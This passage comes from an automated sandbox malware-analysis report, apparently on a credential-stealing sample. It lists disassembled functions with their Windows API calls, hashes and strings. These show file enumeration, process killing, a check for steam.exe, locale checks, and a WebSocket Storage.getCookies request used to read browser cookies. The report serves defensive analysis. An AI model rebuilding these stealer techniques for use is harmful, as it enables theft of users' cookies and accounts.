                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: 7c617e777e750fd44f0d1f02e90dd6f4302af61e157ef358b09c9ceed230975a
                            • Instruction ID: 48799f7cbab4768c8c9e8a23a3d614e7cf6c7aa2719e4f28ed774371e505ef10
                            • Opcode Fuzzy Hash: 7c617e777e750fd44f0d1f02e90dd6f4302af61e157ef358b09c9ceed230975a
                            • Instruction Fuzzy Hash: 63618271A10208AFCB20EF74DD89AEE77B9BF48304F0055A9F945D7251EB78AA44CF64
                            Function 0044D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0044D54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 0044D564
                            • StrCmpCA.SHLWAPI(?,004617A0), ref: 0044D584
                            • StrCmpCA.SHLWAPI(?,004617A4), ref: 0044D59E
                            • lstrcat.KERNEL32(?,00FFFA58), ref: 0044D5E3
                            • lstrcat.KERNEL32(?,00FFF938), ref: 0044D5F7
                            • lstrcat.KERNEL32(?,?), ref: 0044D60B
                            • lstrcat.KERNEL32(?,?), ref: 0044D61C
                            • lstrcat.KERNEL32(?,00461794), ref: 0044D62E
                            • lstrcat.KERNEL32(?,?), ref: 0044D642
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044D682
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044D6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044D737
                            • FindClose.KERNEL32(00000000), ref: 0044D746
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 7458c44e7313ef8fba94643215d52d385ac3cecdc2c573ba30274e82e61f2a5c
                            • Instruction ID: 849fc465ad62b9194410e13a9b0384873ded80adc2509d645eb7ae382274b45c
                            • Opcode Fuzzy Hash: 7458c44e7313ef8fba94643215d52d385ac3cecdc2c573ba30274e82e61f2a5c
                            • Instruction Fuzzy Hash: C8619671D102199FDF20EF74DC88ADE77B9EF48304F0055AAEA4993250DB78AA44CFA4
                            Function 0080A797 Relevance: 16.6, Strings: 12, Instructions: 1554COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,a_~$4l{l$;wOm$Ra?^$VqzK$`zo$ilwv$n`p\$q.:W$yS{V$=>?$VKm
                            • API String ID: 0-3898095992
                            • Opcode ID: 09703aecd71c93ae2c932d3d48af8832f4ac652ae16a1226187217c15a522148
                            • Instruction ID: ff3abcafa29a20672d4ceec44ce9fbbd8c34fe7ad769e5645d7542b11ab6ba3e
                            • Opcode Fuzzy Hash: 09703aecd71c93ae2c932d3d48af8832f4ac652ae16a1226187217c15a522148
                            • Instruction Fuzzy Hash: ABA209F3A0C6049FE3046E2DEC85A7ABBE9EF94720F16893DE6C4C3744E63558058697
                            Function 004548B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: 18957a646e625acf9018134d626dea6f1efd47a91871096a88d474b232b673c2
                            • Instruction ID: 6e697d7da17ed3359726f50e9c881541cba73f49e2cedd5eb13c03e8abed743a
                            • Opcode Fuzzy Hash: 18957a646e625acf9018134d626dea6f1efd47a91871096a88d474b232b673c2
                            • Instruction Fuzzy Hash: 2EA28A71D012599FDB10CFA8C8507EDBBB2BF89305F1481AAE908A7342DB795E89CF54
                            Function 004423A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 004423D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004423F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00442402
                            • lstrlen.KERNEL32(\*.*), ref: 0044240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00442436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00442486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 7357d000cf1cade2d2fa2c53cfdea4b38cc9f9fd168826881a2c81befe26cb81
                            • Instruction ID: 9aa1bcfe12444929c69ba45c46f831c425bd036e4cc97b1f6fe32a08ba09938e
                            • Opcode Fuzzy Hash: 7357d000cf1cade2d2fa2c53cfdea4b38cc9f9fd168826881a2c81befe26cb81
                            • Instruction Fuzzy Hash: 424193317103058BDB31FF65DE85B9F73B9AF18308F40612AF84997212CBB89C019B98
                            Function 004546A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004546B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 004546C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 004546DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 004546ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00454702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00454711
                            • CloseHandle.KERNEL32(00000000), ref: 00454718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00454726
                            • CloseHandle.KERNEL32(00000000), ref: 00454731
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: d9ecc4ac324f6e7f609c4db14a9eba4406e947378a3a61c341560ed928980982
                            • Instruction ID: 437248d726810d848f0ed7ece8a2dac3091fcb443032e3b8104f6840c5f11bdf
                            • Opcode Fuzzy Hash: d9ecc4ac324f6e7f609c4db14a9eba4406e947378a3a61c341560ed928980982
                            • Instruction Fuzzy Hash: B101AD31601124ABE7205B70EC88FFB377DAB89B46F001199FD05D6281EFB899888A74
                            Function 00454610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00454628
                            • Process32First.KERNEL32(00000000,00000128), ref: 00454638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0045464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00454660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00454672
                            • CloseHandle.KERNEL32(00000000), ref: 0045467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: bfe097e44e437a4b8dcd6b9d59a2a95129fa247e8dc77abc0098806331e2572d
                            • Instruction ID: cc760b4b3c846461eeb18a07b2b51f71bce8d4f0cfd00a9d566cef9bbb5847e4
                            • Opcode Fuzzy Hash: bfe097e44e437a4b8dcd6b9d59a2a95129fa247e8dc77abc0098806331e2572d
                            • Instruction Fuzzy Hash: AF01A2716011249BD7209B70AC48FEB77BDEF49351F0001DAED08D2141EFB8C9988BE5
                            Function 00444B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00444B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00444B7F
                            • lstrlen.KERNEL32(00464CA8), ref: 00444B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BA7
                            • lstrcat.KERNEL32(00000000,00464CA8), ref: 00444BB3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00444BDE
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00444BFA
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID:
                            • API String ID: 2567437900-0
                            • Opcode ID: 30ede07c28db9bdc9fb843f820cc702e0e26162dd995e6f91510563bbdcc5e7a
                            • Instruction ID: b98f4717970cea0baaa71a2d1fc599c205a5c47a84646113fe91a34bbfe65f73
                            • Opcode Fuzzy Hash: 30ede07c28db9bdc9fb843f820cc702e0e26162dd995e6f91510563bbdcc5e7a
                            • Instruction Fuzzy Hash: A23185316116559BDB22FF25ED85F9F77B9EF84318F10212AF80597251CBB8EC018BA8
                            Function 007FB599 Relevance: 11.6, Strings: 8, Instructions: 1627COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: #y'm$#y'm$:{d$Hx$Y?_$h@;$j7^$F^_
                            • API String ID: 0-1801948742
                            • Opcode ID: 4e1d936857cb3a961aa0e460ed3915852fdd5286cc62cb0e4c5b162089be19f4
                            • Instruction ID: 33c9726e412e3b9ac3d40940b07fdb904010c492f56d6687a1a1fcff5c1102c6
                            • Opcode Fuzzy Hash: 4e1d936857cb3a961aa0e460ed3915852fdd5286cc62cb0e4c5b162089be19f4
                            • Instruction Fuzzy Hash: E5B208F360C2049FE704AE2DEC85A7AFBE9EF94720F16453DEAC4C3744EA3558058696
                            Function 00452D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00452D9B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00452DAD
                            • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00452DBA
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00452DEC
                            • LocalFree.KERNEL32(00000000), ref: 00452FCA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: 8ed86cffa4d7a7014a2709765f360c4b30189d2214e7b82908a8b2f8413a4f60
                            • Instruction ID: 70713f45a7a17c8e72170897c63513404706ce844dd9bf8df9c186447b706426
